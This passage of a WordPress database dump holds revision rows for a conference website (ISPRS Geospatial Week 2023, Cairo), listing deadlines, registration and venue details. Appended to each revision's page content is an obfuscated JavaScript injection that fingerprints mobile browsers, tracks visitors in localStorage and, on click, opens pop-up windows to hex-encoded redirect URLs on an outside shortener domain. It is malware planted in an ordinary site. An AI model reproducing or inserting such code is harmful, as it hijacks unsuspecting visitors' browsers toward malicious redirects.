_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 01:46:40','2023-02-04 01:46:40','',3066,'https://gsw2023.com/?p=3733',0,'revision','',0),
(3734,1,'2023-02-04 01:59:48','2023-02-04 01:59:48','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 01:59:48','2023-02-04 01:59:48','',3066,'https://gsw2023.com/?p=3734',0,'revision','',0),
(3735,1,'2023-02-04 02:03:59','2023-02-04 02:03:59','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" 